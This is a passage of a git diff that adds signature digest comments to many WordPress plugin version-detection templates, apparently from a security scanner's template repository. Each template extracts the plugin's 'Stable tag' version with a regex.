a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..32017b9a83 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100daf8d56751aea85cbb9670c0a67be5db01afc396f349294857e8c27e22dc79520220331cb77fcb7121c4c2274413917e0df23eb92f5e7540a3575e86156f3eb71c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..3b582d820c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d04f8374578ec823707829ed62fa581d4d03a7ad0d95e7c915f0e495416ca3e402200d8518f2b807e7bc8f7c59464c7dc118c8ce7a0795b57140b5094efb9ff58bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..99ad6cd89b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc934984adaaed3a68bc7e24c61b3eeb2acadea8ac1f7fecfc9dff85b37ba3ad022100f2934973261d5d3efd964a22573555066959976c154e0020843ddbc663ee918d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..221f57b45a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e15e65dd0bb9a24a74326bd56e1656a329b0dd589c9dc0c3060a9ea12d57157402200463487876247765e53cc72e8838047f554c35df9e3685bdd385fa899a3bc9fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..75996e7331 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000f21680c9f1a1add192e3b21fedf0b07a925ce67c4a1d7a9fe0a4be3c021bbc022100b5eba060bd31874f3ce027a042a30ff32d43578645b30c99d756e5ab3d3882e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..b4010b8535 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220340fa90839e32a95e7eb758f99477fa301feed4a0a53a2acd848c3ae77b615430220778d50c5f21069f937b9cadf278300a8b358c13102e90e80356886da87a2ef2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..7f1c4fc0c6 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d932003913236331c68d2782d798a25d5a47e3d65d897171857d02732a38e77022100d7dfca11755d9e91433a29f051ce0099cbed6610987b398f58f9b3482d59559c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..636a2499cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b85eb4081b46abb2268064e3440c8c1b15a282a11dca509996ec38806b3ffaa2022100f6e24f692648a1e6726d474d580c432cb5b3754b93938236eeec269623b81786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..722bef2636 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d6061e3a08480c9d209f1efe4a22669148f07e4b5e0e3025598eaad27c3d992022100ec11c1ee659ad94520bc929d5fd1bd84b9739134c4754040d5f2047fe5394361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..cbe6e93439 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f61bd4468140628fbb3d20f12365ae8916333e443d7dce65be3392278c9d68a02206050779c02c5d275f89836f8df60c3ebadc73049d8ef289540dd408b39a5a51c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..3c119e88bf 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eacb2511c79ec05b60206bdcb5926aa96f7c71918418799e287a61d78f527d3f0221009fee4e29e8f5720496caf1f65292baddbdf947da1a4e289fc2fd75bc4e847e02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..2e4336aae1 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b47de9242bdb013a68cf46e6c1775c6ca2497d0bd1748291d7e0d5ec9c81efc9022100b2fc888a578accfc54f3be1cca29b3951230d50448b8bf549c8f1639fb5ad726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..02bebfefee 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e3251059050ad6385310b93d5b6596cb5328aac5a4ebdc875caeefa38708943022100bce0b885eaa0241d23e6a6bde464c5c46132857beb8d1655b5a7caf9ff286ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..dc7637fa47 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024573b6b0b0499c49cb82cc7cd2276397ffeea265e844fa47dc456e8a8660dc9022064fd27f1ff67f58de1a40c5016a943d2a3d92ea43ee3ae91b8c3e52dc738d08e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..f15d6ba25a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035b29d9f6b3a3ff9da1797f385c1735f9da3c4ff33e3767550148e932596aad7022100ee038b71ec277f0c349175dcb499b0963f90a08eeef925437f55a937f86be405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..09c610dc47 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019718774de49a1c210d65a2ec84cb1ff3df3c44d2c0f72da4b3421e13032b3bb02204e181ee4990718fc83e1a0dbd2b5fd651e1b134a6b8cb65352d30a6eac6fcf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..640ac8e56a 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002f7ffdbfda37feab71d266ca655d1734f37a2197280e70da7da4d3ea629e8cb022100fdbc5a03cb59a59013f42b8aa85103055f1a62ab1d122aa70a4bb833d4071b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..f6b2761c24 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7efc51d92c32c0529e0841dd3d182e13f915658a078b4d83ae319769c4d06eb022100e9715e1b522df9abe907d3717b79cc5aacac98d8f26209cee361a44a37f7be6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..09d625c457 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bdc2aa3e799f768eb46bbe9b4485a43da886ef255c317d52bb1e2fd2438f8ad3022100fb71712addc983da8cfd7e1a8ff3c45941cd225daf0581010dd33dabd4731bf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..966ad44c82 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220776166b36e4a56bfb0f1162edaffc08c0ad3c0119c26f5b94373b0274fad4f60022100f15006ef96b5618784f6aa78cb46c986410f4dbc0dd99470d05ea1a5fbb442b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..f4a4ab4d5b 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d9f48e9857e7e64bfa90e25b9f289bf6ce0772481398131d14faa7037f66e60022100b348a94c976d450274886a6f836dbfb87f3c95d92b9117e136b92e8f61e893dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..163a14b6d5 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdae23a76e7db806ebb974d64b0934136dbdb9e8c1420baed851adcca0dc34eb022100a80aebf08394076bfe8eacad9341774822ff99d46965f26c5ddfba3d6be50c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..e30d776154 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201eee9e73d38f379394aeeffc30a02b88fb4e1f2cce7cddc7e9625f88f5699e3b02203a1f852c1185fb7ccf73f4618df01a23bb556edc78e0272941820d53a6c9b790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1cab0c7e31 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205621f4d15e4e7ed33a36dc8fa7e3137216cd11507f6ddb15ac34be6a824e6c58022100833c1b303e631dbbabecddd668fd9166dded6b6cd196a3885f6b0f6711c6910e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..951ac3a527 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f3192c3175aed17e526ca15acd5f1b6594e64d760831adf95937ae23700d17c0022061ef94cc7a00dd70efac559085df36cd4c8a6cd6d285b6529a83c2a2191959c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..f243eb18dc 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100adabb681c2e981d525bc678c36a6564eaed405212956167611f3529a5a6227ea022100860b7399f56645b030dd95fa4870336150752d7aede5d675af9d13cb38e6fb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..38920b265e 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204123ab25b007bfd8e4d708fcde6f5fbbdfec009131c3dda0beebeda841c34aae0220329d9149d42462ab5c3516c9f5ae9572a038f3b56ac718c7dfd62b63cc9ae605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..a75ad91b3a 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e450d8cf600ff42b19ff2fb838892a27b70782d688fd56fc00fae6030db60e3902202a7d493db8adbcdda86d2c224bca44115664ad093d48c5b03988372c59dbe742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..a170c4179a 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd6dfcb14f6a18fca657031ce2bf51d6125b69822f833b02c2b91372e2db6276022016e2ebe6685ab797bfaa1b409645483db98351325fdb5be3eb25ff885a6c62da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..628371cd9b 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c747c5e0cd2d751522054fba92540cd617ebf9a2353a59f49874e8e5c40a20b202207b16f54945bfb16f00f1d9bc6ced6803d9ea9678db8f21cce7dc92035423c74d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..1b4346b750 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022473c8bb0c72d3587572f80dd54945395034cfcd30f5240943acd5250028e45022100e735edf816f058ec8e1b9866aa71c897ec7e1261baaa25cf265abeee2a40c8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..e22ff6f611 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201daa9511d4a40111de8930b1ac4c1c26c815d6ad6d4c2630d93a37fb1da1018f02204ba71ba14acdb1cc3f1f296a9b9a5a721b8de020a1a2be3b8c75a5c37333b0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..30f04141e6 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4cc431703a07c1babdf6e119ddbdfb7ac4a750ade5302e48ab92c4f82a2638b0221009580cd0665e7f2e197b7c92756951fc8e3d4177f433f1d880eb58bc07b27a61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..cdbc2a1a68 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220300184ebd5b19471b8d7519c3082e8981e5dd6e75f4e57a5f48070b17d4d81ef022100e998c73ea8678486fa64367f6b1ae845103cbf9c4f3e8bd6c44c4a79c8bc9030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..77e9474097 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220451caa697dd44db06efc6b6c7d98f2f7265e873edb7ebaba8cfed17e4a57c951022100cda52330304a558270a55650efa501bf9d5fe5b04f9ab01e979a84c94b831930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..30313a89dc 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f33ca5a7a1abc1501062b1e078f0616fdd57a2543e5dd963da1ff8b820eba9fe022100e3f227aaaebf0e0ca52f8263510e256026d647ad1cf2c12e4e3dee1291b8a73d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..7056b44884 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a128f332b2211fb2848312a2e27c87343ecde21b89986fba3d25278613e31f84022100b71bda84fd5d02835997243b793ed7afa40ce721bd5cb19a3cbd2dab73e6cfe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..aee6443ca1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220087f053070d43e1ce8add1d5f24176d85d297bad70849d43abf6389e240bd6be02203354741deb40c9ae9041c98418ee8c5c26a161b65da27daa61b77cbd16b94c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..9db5083d8c 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081f25a89a7f622af54f5fff8e65bcfadfa919d90b12c594318510b45a70079730220235470bbbe08642c5e422f7f4c5e4d7155fea78b5532b7b8f8b09cdee1a0b51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..e924c6d56b 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030a9e2785beb7d5a4ba781dfa752e9e89e97614f77387ed7e70c83d8ee4551ff02206c7f2e526f706e7b3b50d1d3eef45afa361ac5b5d82a3cf8c75d9df71b37e3b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..d316c499eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b820bf1777f66c9820a53e517be3fbca2ebe0cf7253bef924a7f0315168af5ea02202276f23e8ae5a560d07e6f9263a6c125e1883a5a58427cd4e6b737419dd5ab5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..5647ab5e96 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210091942b6b52fb9843bf49208ff7eb3a3e68bf09464e7f5af69544348ecbaaea2b02210091772d2ba599964c2291e8d4ce77428e26997c03d8455aa02719e90a9d02594b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..17ea404d25 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070192a9a93725f31cb5da833a0272b7f433cab958c4ec039eb60c140daa3dae302201624f54aad5978e7285a5011b28ee7082f704cf2f9c25296fd3bac19f4c95187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..3e7a5ac384 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082382b99510975e18e932da49e39224ee5b3aa59f817212d9f5fa2d21d24c088022100d59058a33ed603c403a4bd16d1a4d90d123aa60c1a478316283c10b3f8e089d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..dcdddf0945 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203aafb037bd942f7983044cd4da9cb599b076b657f5cf091abcd725618ffa24f8022100b287135671e1470c2d660b6c93d65a7a64211c1b2ede23d26280665fbd634c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..bd76151118 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100879aa6608131672f897963612d19d3dceaff33ab5049129f1fa73c20e9f22296022100b6847252ae541c6cfb7a6f14b81cf80a784aa17ea096afccf0019fe010919187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..fcefa44f50 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000f18dda719bb857e01fc1efaaa6acbf81cbb5eb8442721bf4e4bd5654a2531e022001e5d1ca05db685bdec3d31906b4f3cef59248c5dd2a1fe777aa161311339e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml 